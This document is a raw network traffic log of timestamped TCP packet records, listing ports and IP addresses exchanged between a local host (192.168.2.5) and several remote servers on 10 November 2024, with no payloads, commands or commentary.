Nov 10, 2024 04:55:24.065208912 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.065536022 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.066365957 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.066420078 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.066728115 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.066735029 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.066937923 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.067692995 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.067703962 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.068157911 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.068161964 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.072805882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.072828054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.072839975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.072865009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.072882891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.072897911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.072918892 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.072983027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073002100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073013067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073025942 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073057890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073071003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073081970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073081970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073087931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073101044 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073111057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073111057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073112965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073138952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073138952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073143959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073174000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073177099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073196888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073208094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073223114 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073225021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073239088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073252916 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073266983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073276043 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073286057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073296070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073312998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073319912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073324919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073333979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073360920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073369026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073370934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073386908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073400974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073406935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073409081 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073409081 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073431969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073455095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073455095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073470116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073482037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073492050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073502064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073523045 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073523045 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073528051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073545933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073559999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073568106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073568106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073584080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073604107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073604107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073611021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073621988 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073636055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073649883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073662996 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073664904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073677063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073699951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073702097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073713064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073713064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073719025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073729992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073746920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073760033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073766947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073766947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073776007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073787928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073802948 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073810101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073827982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073829889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073839903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073868036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073878050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073878050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073884010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073909044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073913097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073924065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073951006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073964119 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073978901 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.073982000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.073995113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074002981 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074014902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074023962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074033976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074054003 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074054003 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074062109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074079037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074090004 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074109077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074127913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074141979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074147940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074173927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074177027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074186087 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074187040 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074187040 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074201107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074213982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074228048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074228048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074229002 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074254036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074254036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074254990 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074266911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074279070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074290991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074299097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074299097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074299097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074305058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074318886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074330091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074333906 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074340105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074340105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074342966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074354887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074371099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074387074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074410915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074410915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074419975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074436903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074455976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074459076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074459076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074469090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074477911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074481010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074491024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074503899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074513912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074523926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074526072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074527025 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074537992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074542046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074549913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074561119 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074573994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074585915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074595928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074595928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074596882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074608088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074619055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074625969 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074625969 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074632883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074646950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074659109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074667931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074680090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074688911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074700117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074706078 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074717045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074743986 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074743986 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074801922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.074888945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074899912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.074982882 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075021029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075036049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075047016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075057030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075071096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075083017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075090885 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075090885 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075094938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075122118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075126886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075145960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075156927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075160027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075169086 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075186968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075210094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075221062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075227976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075227976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075232983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075247049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075258970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075268984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075268984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075270891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075283051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075299025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075299025 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075310946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.075335026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075335026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.075390100 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.097419977 CET	443	49823	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:24.097675085 CET	49823	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:24.097862959 CET	49823	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:24.097873926 CET	443	49823	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:24.127610922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.132441998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.153932095 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.154398918 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.154422998 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.154892921 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.154896975 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.162240028 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.162285089 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.162547112 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.164438963 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.164447069 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.164483070 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.164488077 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.167273998 CET	49847	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.167289019 CET	443	49847	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.171428919 CET	49847	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.171610117 CET	49847	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.171621084 CET	443	49847	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.171646118 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.178101063 CET	443	49825	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.178214073 CET	443	49825	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.179377079 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.179377079 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.179682970 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.179697990 CET	443	49825	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.189940929 CET	49848	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.189973116 CET	443	49848	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.190114021 CET	49848	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.190391064 CET	49848	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.190417051 CET	443	49848	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.195229053 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.195823908 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.195843935 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.196405888 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.196412086 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.202102900 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.202302933 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.202405930 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.202439070 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.202439070 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.202445984 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.202454090 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.204912901 CET	49849	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.204927921 CET	443	49849	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.205063105 CET	49849	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.205147028 CET	49849	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.205157042 CET	443	49849	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.236613035 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.236731052 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.236839056 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.237782955 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.237787962 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.240232944 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.240746021 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.240755081 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.242007017 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.242046118 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.242063999 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.242094994 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.242276907 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.242799997 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.242806911 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.243088007 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.243160963 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.244566917 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.244574070 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.291270971 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.291322947 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.291538000 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.291627884 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.291640043 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.291651011 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.291655064 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.294445038 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.294459105 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.294593096 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.294749022 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.294759035 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.307543039 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.307806015 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.307816029 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.308778048 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.308836937 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.310307026 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.310360909 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.310514927 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.310520887 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.314203024 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.314487934 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.314496994 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.315462112 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.315517902 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.316386938 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.316442013 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.316859961 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.316867113 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.316884995 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.316893101 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.327730894 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.327940941 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.327989101 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.328141928 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.328141928 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.328161001 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.328170061 CET	443	49829	13.107.246.45	192.168.2.5
